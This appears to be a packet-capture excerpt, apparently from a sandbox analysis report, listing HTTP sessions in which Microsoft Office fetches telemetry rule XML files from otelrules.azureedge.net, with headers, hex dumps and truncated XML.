                                            2024-11-18 20:16:54 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:54 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1395
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                            ETag: "0x8DC582BDE12A98D"
                                            x-ms-request-id: 6763c5ef-a01e-000d-6fc4-37d1ea000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201654Z-16547b76f7fwggrphC1DFW2a8s000000054000000000pp3r
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:54 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            114192.168.2.44986413.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:54 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:54 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:54 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1358
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                            ETag: "0x8DC582BE6431446"
                                            x-ms-request-id: 21ae6e2f-801e-008f-20af-362c5d000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201654Z-16547b76f7fm8pcwhC1DFWaxcc00000004c000000000f0nq
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:54 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            115192.168.2.44986713.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:54 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:54 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:54 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1389
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                            ETag: "0x8DC582BE10A6BC1"
                                            x-ms-request-id: c22da945-001e-00ad-15a1-36554b000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201654Z-1866b5c5fbbb9dv9hC1DFWps5c00000001d000000000fkdy
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:54 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            116192.168.2.44986313.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:54 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:55 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:54 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1395
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                            ETag: "0x8DC582BE017CAD3"
                                            x-ms-request-id: 1604fc63-801e-0047-0dc4-377265000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201654Z-1866b5c5fbb2ngs6hC1DFW402w00000004eg00000000qzak
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:55 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            117192.168.2.44986813.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:55 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:55 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:55 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1352
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                            ETag: "0x8DC582BE9DEEE28"
                                            x-ms-request-id: 9c6f226a-f01e-003f-6009-37d19d000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201655Z-16547b76f7fz92z5hC1DFWmdx800000004n0000000008feb
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:55 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            118192.168.2.44986913.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:55 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:55 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:55 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1405
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                            ETag: "0x8DC582BE12B5C71"
                                            x-ms-request-id: cf21543a-c01e-0079-7409-37e51a000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201655Z-16547b76f7fxqj4khC1DFWpypw00000003h000000000x4tk
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:55 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            119192.168.2.44987013.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:55 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:55 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:55 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1368
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                            ETag: "0x8DC582BDDC22447"
                                            x-ms-request-id: 969097d6-001e-0046-4dc6-37da4b000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201655Z-16547b76f7fxqj4khC1DFWpypw00000003rg000000002x9d
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:55 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            120192.168.2.44987113.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:55 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:55 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:55 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1401
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                            ETag: "0x8DC582BE055B528"
                                            x-ms-request-id: 83606b1e-901e-00ac-2b7d-37b69e000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201655Z-164f84587bf6h2bxhC1DFWbcm800000006d000000000ughs
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:55 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            121192.168.2.44987213.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:55 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:56 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:55 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1364
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                            ETag: "0x8DC582BE1223606"
                                            x-ms-request-id: e48d079a-201e-00aa-1709-373928000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201655Z-1866b5c5fbbfrdddhC1DFW7e9000000002ag00000000d10q
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:56 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            122192.168.2.44987313.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:56 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:56 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:56 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1360
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                            ETag: "0x8DC582BDDEB5124"
                                            x-ms-request-id: a94ee65e-c01e-007a-7daf-36b877000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201656Z-16547b76f7f6892shC1DFWawd0000000039000000000dtqb
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:56 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            123192.168.2.44987413.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:56 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:56 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:56 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1397
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                            ETag: "0x8DC582BE7262739"
                                            x-ms-request-id: 22a3ed20-101e-005a-80a7-36882b000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201656Z-1866b5c5fbbfhwqqhC1DFWc9sw00000000p000000000r00v
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:56 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            124192.168.2.44987513.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:56 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:56 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:56 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1403
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                            ETag: "0x8DC582BDCB4853F"
